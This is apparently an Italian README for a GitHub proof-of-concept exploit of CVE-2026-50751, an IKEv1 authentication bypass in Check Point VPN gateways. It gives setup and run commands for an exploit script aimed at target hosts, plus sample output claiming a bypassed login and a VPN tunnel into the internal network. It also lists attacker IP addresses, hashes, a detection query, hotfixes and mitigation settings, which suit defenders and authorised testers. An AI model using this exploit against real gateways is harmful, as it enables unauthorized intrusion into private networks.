
Vulnerabilità: debolezza nel flusso logico in Remote Access e Mobile Access
Questo codice è SOLO a scopo educativo e per test di sicurezza autorizzati. L'uso non autorizzato contro sistemi senza permesso esplicito è ILLEGALE. L'autore non si assume alcuna responsabilità per l'uso improprio di questo strumento.
CVE-2026-50751 è una vulnerabilità critica di bypass dell'autenticazione nel protocollo IKEv1 (deprecato) di Check Point, che colpisce Remote Access VPN e Mobile Access. Un attaccante non autenticato può sfruttare un difetto nella validazione dei certificati per stabilire una connessione VPN senza necessità di una password valida.
| Prodotto | Versioni |
|---|---|
| Security Gateways | R80.40 - R82.10 con IKEv1 abilitato |
| Spark Firewalls | R80.20.X, R81.10.X, R82.00.X |
| Mobile Access | Tutte le versioni con IKEv1 |
# Clonare il repository
git clone https://github.com/username/CVE-2026-50751-PoC
cd CVE-2026-50751-PoC
# Installare le dipendenze
pip install -r requirements.txt
# Dare i permessi di esecuzione
chmod +x exploit.py
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
# Rilevare se IKEv1 è abilitato
python3 detector.py -t 192.168.1.1 -p 500
# Scansione rapida
python3 detector.py -t vpn.target.com -p 4500
# Eseguire il bypass dell'autenticazione
python3 exploit.py -t 192.168.1.1 -p 500
# Con interfaccia specifica
python3 exploit.py -t vpn.target.com --interface eth0
# Modalità verbose
python3 exploit.py -t 192.168.1.1 -p 500 -v
╔═══════════════════════════════════════════════════════════════╗
║ CVE-2026-50751 - Check Point IKEv1 Authentication Bypass ║
║ Critical VPN Authentication Bypass Exploit ║
║ CVSS: 9.3 | CISA KEV: 2026-06-08 ║
╚═══════════════════════════════════════════════════════════════╝
[1] Avvio della Main Mode IKEv1...
[+] Risposta ricevuta - SPI: a1b2c3d4e5f67890
[2] Invio payload KE + NONCE modificati...
[+] Gateway ha accettato KE/NONCE modificati - Vulnerabilità attivata!
[3] Calcolo delle chiavi di autenticazione...
[4] Invio dell'autenticazione falsificata...
[+] SUCCESSO! Autenticazione bypassata!
[+] IKE SA stabilita senza credenziali valide
[5] Stabilimento del tunnel VPN...
[+] Tunnel VPN stabilito!
[+] Accesso alla rete interna disponibile
[✓] EXPLOIT RIUSCITO
[✓] Bypass dell'autenticazione ottenuto
[✓] Tunnel VPN stabilito
[!] Il sistema è VULNERABILE - Applicare immediatamente l'hotfix
# Query per rilevare attaccanti
action:"Key Install" AND (src:45.77.149.152 OR dst:45.77.149.152)
| Tipo | Valore |
|---|---|
| IP attaccanti | 45.77.149.152, 209.182.225.136, 38.60.157.139, 162.33.177.101, 45.76.26.42, 144.208.127.155, 38.54.88.201, 38.54.107.167, 66.42.99.200, 45.63.104.106, 45.61.136.173 |
| Hash | 52fda5c1b9704544f32ee98d9060e689, 51d39aa39478beeac94f2d12f682ecce |
| Versione | Hotfix Take | Link |
|---|---|---|
| R82.10 | Take 19 | Scarica |
| R82 | Take 103 | Scarica |
| R81.20 | Take 141 | Scarica |
Disabilitare i client legacy: SmartConsole → Gateway → VPN Clients → Authentication Deselezionare "Allow older clients"
Forzare solo IKEv2: Global Properties → Remote Access → VPN Authentication Selezionare "IKEv2 only"
Rendere obbligatorio il Machine Certificate: VPN Clients → Authentication → Machine Certificate Authentication Impostare su "Mandatory"
| Data | Evento |
|---|---|
| 2026-05-07 | Primo sfruttamento osservato |
| 2026-06-04 | Check Point avvia le indagini |
| 2026-06-08 | CVE pubblicato, CISA aggiunge al KEV |
| 2026-06-11 | Scadenza CISA per l'applicazione della patch |
Questo software è fornito "così com'è", senza garanzie di alcun tipo. L'autore non è responsabile per l'uso improprio di questo strumento. Utilizzarlo solo su sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione al test.
Per segnalare bug o contribuire:
⭐ Se questo PoC ti è stato utile, considera di lasciare una stella al repository
cryptography>=41.0.0
scapy>=2.5.0
colorama>=0.4.6
⚠️ Nota importante per GitHub: